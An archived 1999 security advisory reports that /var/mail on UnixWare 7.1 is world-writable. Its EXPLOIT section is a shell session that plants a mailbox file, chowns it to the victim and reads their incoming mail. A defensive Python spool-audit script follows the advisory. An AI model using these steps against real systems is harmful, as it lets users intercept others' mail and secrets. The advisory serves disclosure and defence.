
unixware7.mail.txt

06 Dec 1999, reported by Brock Tellier. Type: packetstorm. Source: packetstormsecurity.com

UnixWare 7.1 allows users to read/modify others' mail due to permissions issues in /var/mail.

Code
`Greetings,  
  
OVERVIEW  
Any user can read/modify others' mail.  
  
BACKGROUND  
Only UnixWare 7.1 was tested.  
  
DETAILS  
Imagine my surprise when I saw that /var/mail was mode 777. As such, any  
user may create a file called /var/mail/<username> with a mode readable by  
him and trap all incoming mail. Afraid of getting caught? chown the file  
to <username> (see my advisory on this subject), leaving it still  
world-readable, and no one will ever know who did it.   
  
  
All of this assumes, of course, that the user has not received any mail  
yet. If you keep track of your /etc/passwd file, you can monitor for new  
entries and create the files as needed.  
  
This permissions problem obviously opens the door for all sorts of  
problems with symlinks and such. I would imagine that some mail delivery  
programs which aren't as smart as sendmail will follow symlinks in  
/var/mail.  
  
And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG  
LIE:  
  
bash-2.02$ cat /usr/bin/mail  
#!/bin/sh  
cat > /dev/null  
exit 0  
bash-2.02$   
  
;)  
  
EXPLOIT  
  
bash-2.02$ id  
uid=106(xnec) gid=1(other)  
bash-2.02$ pwd  
/var/mail  
bash-2.02$ touch btellier  
bash-2.02$ chown btellier btellier  
bash-2.02$ ls -la btellier  
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier  
  
Now wait for btellier to get some mail...  
  
bash-2.02$ ls -la btellier  
-rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier  
bash-2.02$ cat btellier  
From root Sat Dec 4 07:55:29 1999  
Return-Path: root  
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842  
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)  
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)  
From: root@localhost  
Message-Id: <199912041355.HAA04842@localhost>  
Status:   
  
X-Status:   
  
X-SCO-PAD: XXXXXX  
X-SCO-UID: 1  
Content-Length: 52  
  
your ueber-secure password on 0wned.com is a@f9;se0  
bash-2.02$   
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
[email protected]  
  
  
`
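
A defender-side audit for the conditions the advisory describes (a world-writable spool directory, mailbox files readable by others, symlinks in the spool), added here as an example and not part of the original advisory. The names `audit_spool`, `uid_of` and `demo` are hypothetical, and the spool that `demo` builds is constructed sample data in a temporary directory.

```python
import os
import stat
import tempfile

def audit_spool(spool, uid_of):
    """Return (path, finding) pairs for a mail spool directory.

    uid_of maps a mailbox name to its expected owner uid, or None if unknown.
    """
    findings = []
    mode = stat.S_IMODE(os.lstat(spool).st_mode)
    # World-writable without the sticky bit lets any user create or replace
    # entries: the condition the advisory reports for /var/mail (mode 777).
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        findings.append((spool, "world-writable without sticky bit"))
    for name in sorted(os.listdir(spool)):
        path = os.path.join(spool, name)
        st = os.lstat(path)  # lstat: never follow a planted symlink
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, "symlink in spool"))
            continue
        if not stat.S_ISREG(st.st_mode):
            findings.append((path, "not a regular file"))
            continue
        # Ownership alone proves nothing: the advisory chowns the planted
        # file to the victim, so the mode must be checked as well.
        if stat.S_IMODE(st.st_mode) & (stat.S_IROTH | stat.S_IWOTH):
            findings.append((path, "mailbox accessible to other"))
        expected = uid_of(name)
        if expected is None:
            findings.append((path, "no matching account"))
        elif st.st_uid != expected:
            findings.append((path, "owner does not match mailbox name"))
    return findings

def demo():
    """Build a constructed spool that mimics the advisory and audit it."""
    with tempfile.TemporaryDirectory() as spool:
        os.chmod(spool, 0o777)
        me = os.getuid()
        for name, mode in (("btellier", 0o644), ("alice", 0o600)):
            path = os.path.join(spool, name)
            open(path, "w").close()
            os.chmod(path, mode)
        os.symlink("/nonexistent", os.path.join(spool, "bob"))
        uids = {"btellier": me, "alice": me, "bob": me}
        return [(os.path.basename(p), f) for p, f in audit_spool(spool, uids.get)]

if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

On a real host, `uid_of` would be a lookup against the account database, for example a wrapper around `pwd.getpwnam` that returns `None` on `KeyError`.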
